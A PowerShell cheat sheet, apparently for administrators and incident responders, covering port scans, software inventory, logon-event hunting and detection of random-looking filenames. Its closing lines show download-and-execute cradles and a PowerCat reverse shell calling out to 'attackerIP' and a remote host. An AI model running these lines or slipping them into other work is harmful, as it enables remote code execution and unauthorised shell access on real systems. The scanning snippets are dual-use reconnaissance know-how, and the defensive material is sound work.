PowerShell

Simple Ping Sweep

2..254 | ForEach-Object { Test-Connection -ComputerName XXX.XXX.XXX.$_ -Count 1 -ErrorAction SilentlyContinue }

Each host reports its own neighbours from the ARP cache. $ComputerList is a variable holding the list of computer names (for example loaded from a text file with Get-Content); the multicast (01-00-5E) and broadcast MAC entries are filtered out so only real neighbours remain. WinRM must be enabled on the targets.

$Results = Invoke-Command -ComputerName $ComputerList -ScriptBlock { Get-NetNeighbor -AddressFamily IPv4 | Where-Object {$_.LinkLayerAddress -notlike "01-00-5E*" -and $_.LinkLayerAddress -notlike "FF-FF-FF-FF-FF-FF"} }

Software inventory list (Can be altered to loop through a list of computers as per above)

@("HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*") | ForEach-Object { Get-ItemProperty -Path $_ | Select-Object DisplayName,PSChildName,Publisher,InstallLocation }
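The inventory one-liner above only covers the local machine. The following is an added example (not from the original page) that runs the same two registry queries on every host in $ComputerList in a single Invoke-Command call, tags each row with the host it came from, and then lists the products found on the fewest hosts, which is where unexpected tooling tends to show up. The input file path, the output CSV path, and the assumption that WinRM is enabled on the targets are all assumptions.

```powershell
# Added example: installed-software inventory across many hosts via WinRM.
# $ComputerList is loaded from an assumed text file with one hostname per line.
$ComputerList = Get-Content -Path "C:\Temp\computers.txt"

# Native 64-bit and WOW6432Node (32-bit-on-64-bit) uninstall keys
$UninstallKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*"
)

$Inventory = Invoke-Command -ComputerName $ComputerList -ErrorAction SilentlyContinue -ScriptBlock {
    # $using: pulls the local variable into the remote session
    $using:UninstallKeys | ForEach-Object { Get-ItemProperty -Path $_ -ErrorAction SilentlyContinue } |
        Where-Object { $_.DisplayName } |   # drop keys with no display name (update stubs, leftovers)
        Select-Object DisplayName, DisplayVersion, Publisher, InstallDate, InstallLocation, PSChildName
}

# Per-host view; PSComputerName is added to every object by Invoke-Command
$Inventory | Sort-Object PSComputerName, DisplayName |
    Select-Object PSComputerName, DisplayName, DisplayVersion, Publisher, InstallDate |
    Export-Csv -Path "C:\Temp\software-inventory.csv" -NoTypeInformation   # assumed output path

# Outlier view: products installed on the fewest hosts come first
$Inventory | Group-Object DisplayName |
    Select-Object Name, Count, @{n='Hosts'; e={ ($_.Group.PSComputerName | Sort-Object -Unique) -join ',' }} |
    Sort-Object Count |
    Format-Table -AutoSize
```

Hosts that are offline or reject WinRM are skipped silently because of -ErrorAction SilentlyContinue; compare the distinct PSComputerName values in $Inventory against $ComputerList to see which hosts did not answer.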

Simple TCP port scan (IPv4) (1234..5678 refers to port range)

$ips = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX")
$ips | ForEach-Object { $ip = $_; 1234..5678 | ForEach-Object { if (Test-NetConnection -ComputerName $ip -Port $_ -InformationLevel Quiet -WarningAction SilentlyContinue) { "${ip}:$_ open" } } }

Simple UDP port scan (IPv4)

$ips = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX")
$ips | ForEach-Object { $ip = $_; 1234..5678 | ForEach-Object { $port = $_
    $UDP = New-Object System.Net.Sockets.UdpClient; $UDP.Client.ReceiveTimeout = 1000; $UDP.Connect($ip, $port)
    [void]$UDP.Send([byte[]]@(0), 1)   # UDP has no handshake, so Connect() alone proves nothing; a probe must be sent
    $ep = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any, 0)
    try { [void]$UDP.Receive([ref]$ep); "${ip}:$port open (replied)" }
    catch { if ($_.Exception.InnerException.SocketErrorCode -eq 'ConnectionReset') { "${ip}:$port closed" } else { "${ip}:$port open|filtered" } }   # ICMP port unreachable surfaces as ConnectionReset; a timeout means no answer
    $UDP.Close() } }

Search for string in file recursively through folders and provide path of file

Get-ChildItem -Recurse -File | Select-String -Pattern "dummy" -List | Select-Object -ExpandProperty Path

Get Windows security events and group by ID count (reading the whole Security log can take minutes on a busy host; add -MaxEvents or a -FilterHashtable time window to bound it)

Get-WinEvent -LogName Security | Group-Object -Property Id -NoElement

Display all successful logons within 24 hours and provide usernames (Ensure the TargetWorkstation variable exists). Data[5] is TargetUserName in the 4624 event schema; no logon type filter is applied, so network, service and batch logons are counted alongside interactive ones.

Invoke-Command {Get-WinEvent -FilterHashtable @{LogName="Security";Id=4624;StartTime=$((Get-Date).AddDays(-1))} | ForEach-Object {$e=[xml]$_.ToXml();$e.Event.EventData.Data[5]} | Select-Object -ExpandProperty "#text" | Group-Object -NoElement } -ComputerName $TargetWorkstation

Active Directory - Search for last logon date of specified user (LastLogonDate is derived from the replicated lastLogonTimestamp attribute, which is only refreshed about every 14 days, so it can be that stale; the non-replicated lastLogon attribute on each DC is exact)

Get-ADUser -Identity username -Properties "LastLogonDate"

Find all local users who have logged in during the last 10 days (adjust (-10) to change days)

Get-LocalUser | Where-Object {$_.LastLogon -ge (Get-Date).AddDays(-10)} | Select-Object Name,Enabled,SID,LastLogon | Format-List

Method for discovering accounts logged into the most systems across the network by count (Ensure the Workstations variable exists). Each host returns its distinct 4624 usernames, so grouping the combined output gives, per account, the number of systems it has logged into.

Invoke-Command -ComputerName $Workstations -ScriptBlock { Get-WinEvent -FilterHashtable @{LogName="Security";Id=4624} | ForEach-Object {$e=[xml]$_.ToXml();$e.Event.EventData.Data[5].'#text'} | Select-Object -Unique } | Group-Object -NoElement | Sort-Object -Property Count -Descending
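The two 4624 one-liners above address EventData by position and count every logon type. The following is an added example (not from the original page) that serves both: it maps the event fields by name, keeps only interactive-style logons (types 2, 7, 10, 11), drops machine and built-in system accounts, and then reports each account with the number of distinct hosts it was seen on. The $Workstations names and the one-day window are assumptions, and WinRM is assumed to be enabled on the targets.

```powershell
# Added example: 4624 logons by named field, filtered to interactive types,
# then ranked by the number of distinct systems per account.
$Workstations = @("WS01", "WS02", "WS03")   # assumed hostnames
$Since = (Get-Date).AddDays(-1)            # assumed window

$Logons = Invoke-Command -ComputerName $Workstations -ErrorAction SilentlyContinue -ScriptBlock {
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $using:Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            # Build a name -> value map so fields are addressed by name, not by index
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{
                Time      = $_.TimeCreated
                User      = "$($d.TargetDomainName)\$($d.TargetUserName)"
                LogonType = [int]$d.LogonType
                SourceIp  = $d.IpAddress
                Process   = $d.ProcessName
            }
        } |
        Where-Object {
            # 2 = Interactive, 7 = Unlock, 10 = RemoteInteractive (RDP), 11 = CachedInteractive.
            # Drop machine accounts (trailing $) and the usual built-in noise.
            $_.LogonType -in 2, 7, 10, 11 -and
            $_.User -notmatch '\$$' -and
            $_.User -notmatch '^(NT AUTHORITY|Window Manager|Font Driver Host)\\'
        }
}

# PSComputerName is attached to every returned object by Invoke-Command
$Logons |
    Group-Object User |
    Select-Object Name,
        @{n='Systems'; e={ ($_.Group.PSComputerName | Sort-Object -Unique).Count }},
        @{n='Logons';  e={ $_.Count }} |
    Sort-Object Systems, Logons -Descending |
    Format-Table -AutoSize
```

To hunt lateral movement rather than user sprawl, change the LogonType filter to 3 (network) and group on SourceIp as well; the field map makes that a one-line change, which the positional Data[5] form does not.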

Detect randomness of filenames within a given directory (see the Security Tools List for the Freq-PS script required for this command). Used for finding malicious files with random names; lower frequency scores indicate less natural, more random-looking names, so the default ascending sort surfaces the most suspicious first.

. C:\Scripts\freq.ps1   # dot-source the freq.ps1 script so Get-FrequencyScore is available in this session
Get-ChildItem | Get-FrequencyScore -Property Name | Select-Object -Property Name,FrequencyScore | Sort-Object -Property FrequencyScore -Unique

Downloading PowerCat from GitHub, then using it to open a connection to a remote server

IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besmorhino/powercat/master/powercat.ps1'); powercat -c <REMOTEIP> -p <REMOTEPORT> -e powershell

The following will download and store a remote file to disk.

Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when run from a command prompt.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')"
